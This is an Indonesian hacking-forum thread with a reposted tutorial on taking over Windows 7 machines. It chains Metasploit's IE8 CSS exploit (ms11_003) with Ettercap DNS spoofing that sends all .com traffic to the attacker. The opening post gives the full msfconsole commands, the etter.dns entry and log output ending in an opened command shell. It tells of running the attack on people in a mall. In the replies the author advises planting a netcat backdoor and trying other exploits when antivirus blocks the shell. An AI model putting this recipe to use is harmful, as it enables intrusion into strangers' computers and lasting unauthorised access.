Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-26-2013, 12:32 AM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Network Hacking v
« Previous 1 2 3 4 5 ... 10 Next »

[Tutor] Hacking mendapatkan shell di Windows 7 Full Version melalui jaringan

Home General Computer Multimedia Business Lounge

Pages (2): 1 2 Next »
Post Reply 
Tweet
Threaded Mode | Linear Mode
Tutor Hacking mendapatkan shell di Windows 7 Full Version melalui jaringan
06-07-2012, 11:04 AM (This post was last modified: 09-16-2012 07:24 PM by ubuntux.)
Post: #1
ubuntux Offline
./Admiral of Devilzc0der
 		Posts: 1,628
Joined: Dec 2011
Reputation: 75
Hacking mendapatkan shell di Windows 7 Full Version melalui jaringan
Ane full copas dari blog xcode neh ketawa
Langsung aja ke tutorialnya pinter
Windows 7 adalah Microsoft Windows yang menggantikan Windows Vista. Windows 7 adalah Windows terbaru saat ini yang dibuat oleh Microsoft.

Disini saya akan memberikan contoh bagaimana cara hacking mendapatkan shell di windows 7 melalui jaringan dengan memanfaatkan browser Internet Explorer 8 yang mempunyai celah keamanan pada penanganan Cascading Style Sheets di memory (http://www.microsoft.com/technet/securit...003.mspx).

Oke saya langsung saja.

Pertama kali download Metasploit Framework 3.71 atau yang lebih baru, setelah didownload maka anda jalankan metasploitnya, disini penulis menggunakan GUI. Setelah masuk di tampilan GUI maka klik Exploits -> Windows -> Browser -> ms11_003_ie_css_import, payload yang penulis pilih adalah shell lalu bind shell, lalu port di set 80, URIPATH penulis set /, saat exploitasi penulis tampilkan dalam bentuk Run in Console.

< metasploit >
————
\ ,__,
\ (oo)____
(__) )\
||–|| *

=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ — –=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12635 updated 59 days ago (2011.05.16)

Warning: This copy of the Metasploit Framework was last updated 59 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projec...i/Updating

msf > use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms11_003_ie_css_import) > set URIPATH /
URIPATH => /
msf exploit(ms11_003_ie_css_import) > exploit
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:80/
[*] Started bind handler
[*] Local IP: http://192.168.1.10:80/
[*] Server started.

Setelah itu, jalankan teknik DNS Spoofing, anda bisa menggunakan Ettercap, penulis sudah beberapa kali mengisi seminar tentang DNS Spoofing di tahun 2008 dan 2009. Contohnya penulis mendemokan langsung untuk melakukan hacking windows Vista dengan memanfaatkan celah keamanan browser IE 7 dan DNS Spoofing menggunakan ettercap di suatu mall di Jogja, bahkan apalagi saat ini sudah banyak tutorial tentang cara menggunakan teknik DNS Spoofing menggunakan ettercap di google, sehingga penulis tidak perlu menuliskannya disini.

[Image: ettercap.png]
Disini, penulis asumsikan kita menggunakan ettercap yang penulis set di etter.dns, contoh dimasukkan *.com A 192.168.1.10, save lalu jalankan Spoofingnya, karena celah ini pada keamanan IE, maka korban harus membuka situsnya dengan IE yang punya celah keamanan tersebut. Apapun situs dengan domain .com yang dibuka oleh pengguna windows 7 dengan IE 8 tersebut maka akan langsung diarahkan ke URL komputer penulis yaitu http://192.168.1.10. Setelah dijalankan IP itu di IE maka akan tampill seperti berikut di Metasploit kita.

[*] 192.168.1.10:1884 Received request for “/”
[*] 192.168.1.10:1884 Sending windows/browser/ms11_003_ie_css_import redirect
[*] 192.168.1.10:1884 Received request for “/Gm8zVwl.html”
[*] 192.168.1.10:1884 Sending windows/browser/ms11_003_ie_css_import HTML
[*] Started bind handler
[*] 192.168.1.10:1884 Received request for “/generic-1310601540.dll”
[*] 192.168.1.10:1884 Sending windows/browser/ms11_003_ie_css_import .NET DLL
[-] Exception handling request: An existing connection was forcibly closed by the remote host.
[*] 192.168.1.10:1889 Received request for “/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A”
[*] 192.168.1.10:1889 Sending windows/browser/ms11_003_ie_css_import CSS
[*] Sending stage (240 bytes) to 192.168.1.10
[*] Command shell session 2 opened (192.168.1.10:1890 -> 192.168.1.10:4444) at 2011-07-14 06:59:03 +0700

[Image: hackwin75.jpg]
Binggo, kita mendapatkan shell. ketawa

Untuk pengamanan anda dapat update IE anda atau upgrade ke IE 9. Penulis tidak bertanggung jawab segala hal yang diakibatkan tutorial ini.

Sumber: http://blog.xcode.or.id/?p=209
Visit this user's website Find all posts by this user
Quote this message in a reply
06-07-2012, 06:53 PM
Post: #2
izanagi Offline
Asistennya El-Farhatz
 		Posts: 192
Joined: May 2010
Reputation: 7
RE: Hacking mendapatkan shell di Windows 7 Full Version melalui jaringan
smangat its work!!
mantap
Visit this user's website Find all posts by this user
Quote this message in a reply
06-07-2012, 07:47 PM
Post: #3
cotalika Offline
./Devilz Commander
 		Posts: 352
Joined: Oct 2010
Reputation: 3
RE: Hacking mendapatkan shell di Windows 7 Full Version melalui jaringan
wahh masih dibawah ilmu saya untuk hal sperti ini.. nyimak aja
Visit this user's website Find all posts by this user
Quote this message in a reply
06-10-2012, 02:28 AM
Post: #4
netheroes Offline
./Devilz 1st Cadet
 		Posts: 13
Joined: Jun 2010
Reputation: 0
RE: Hacking mendapatkan shell di Windows 7 Full Version melalui jaringan
masih belum ngerti ane gan.. soalnya ane masih cupu
Visit this user's website Find all posts by this user
Quote this message in a reply
06-15-2012, 12:29 PM
Post: #5
arietux Offline
./Devilz Advisor
 		Posts: 847
Joined: Mar 2012
Reputation: 50
RE: Hacking mendapatkan shell di Windows 7 Full Version melalui jaringan
(06-10-2012 02:28 AM)netheroes Wrote:  masih belum ngerti ane gan.. soalnya ane masih cupu

Waw,, Sini saya ajarin mbak wawa
Visit this user's website Find all posts by this user
Quote this message in a reply
06-24-2012, 03:26 AM
Post: #6
lucenzo Offline
./Devilz 1st Cadet
 		Posts: 2
Joined: Jan 2012
Reputation: 0
RE: Hacking mendapatkan shell di Windows 7 Full Version melalui jaringan
masi cupu gan....
Find all posts by this user
Quote this message in a reply
07-05-2012, 04:26 PM
Post: #7
qibo212 Offline
./Devilz Officer
 		Posts: 93
Joined: Jul 2010
Reputation: 1
RE: Hacking mendapatkan shell di Windows 7 Full Version melalui jaringan
DNS spoofing itu kuncinya
Find all posts by this user
Quote this message in a reply
07-14-2012, 12:19 PM
Post: #8
toepaycyber Offline
./Devilz 1st Cadet
 		Posts: 8
Joined: Jul 2012
Reputation: 0
RE: Hacking mendapatkan shell di Windows 7 Full Version melalui jaringan
trus klo udh dapet shell di apain gan ?
Find all posts by this user
Quote this message in a reply
07-14-2012, 10:09 PM
Post: #9
gundulg25 Offline
./Devilz 1st Cadet
 		Posts: 1
Joined: Jul 2012
Reputation: 0
RE: Hacking mendapatkan shell di Windows 7 Full Version melalui jaringan
kalu bkan di shell lewat yang lain gmana caranya??? soalnya shell target ada filternya pake antivirus canggih
Find all posts by this user
Quote this message in a reply
07-14-2012, 10:36 PM (This post was last modified: 07-14-2012 10:37 PM by ubuntux.)
Post: #10
ubuntux Offline
./Admiral of Devilzc0der
 		Posts: 1,628
Joined: Dec 2011
Reputation: 75
RE: Hacking mendapatkan shell di Windows 7 Full Version melalui jaringan
(07-14-2012 12:19 PM)toepaycyber Wrote:  trus klo udh dapet shell di apain gan ?

di tanem backdoor om, misalnya netcat ketawa
(07-14-2012 10:09 PM)gundulg25 Wrote:  kalu bkan di shell lewat yang lain gmana caranya??? soalnya shell target ada filternya pake antivirus canggih

coba pake exploit lainnya om ketawa
Visit this user's website Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Pages (2): 1 2 Next »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [Tutor] Tutorial Hacking Speedy Account aLdyJrz 35 2,079 04-19-2013 09:06 PM
Last Post: NvC User
  Wireless Network Hacking Software (WEP WPA and WPA2) el_nino 31 6,480 04-16-2013 06:13 PM
Last Post: Raikkonen
Thumbs Up [Tutor] hacking password hotspot dj rabell 57 3,374 04-05-2013 12:13 AM
Last Post: ceetos
  dos / ddos tanpa php shell (dari komp kita / pakai ip warnet :) t000mmyyy 56 1,592 03-10-2013 08:51 AM
Last Post: M4d3X
  [Ask] Tutorial Hacking Melalui Modem ADSL f1r3s4l3 6 146 03-07-2013 03:46 PM
Last Post: civo
  [Tutor] hacking bufering di youtube DC™Rebels 26 1,041 01-19-2013 07:28 PM
Last Post: ILastKetchup
  Buat komputer di jaringan supaya bluescreen oela 53 2,548 01-03-2013 08:18 AM
Last Post: Rango
Wink [Tutor] Wireless Hacking – Cracking WPA / PSK Key Mr.Sign 12 925 12-24-2012 11:47 AM
Last Post: momoattacker
  [Ask] Windows Proxy Coziboy 7 119 11-24-2012 04:13 PM
Last Post: vmwmxholic
  telnet hacking dhelpi7 16 821 02-22-2012 05:08 PM
Last Post: chiboga

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-26-2013, 12:32 AM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE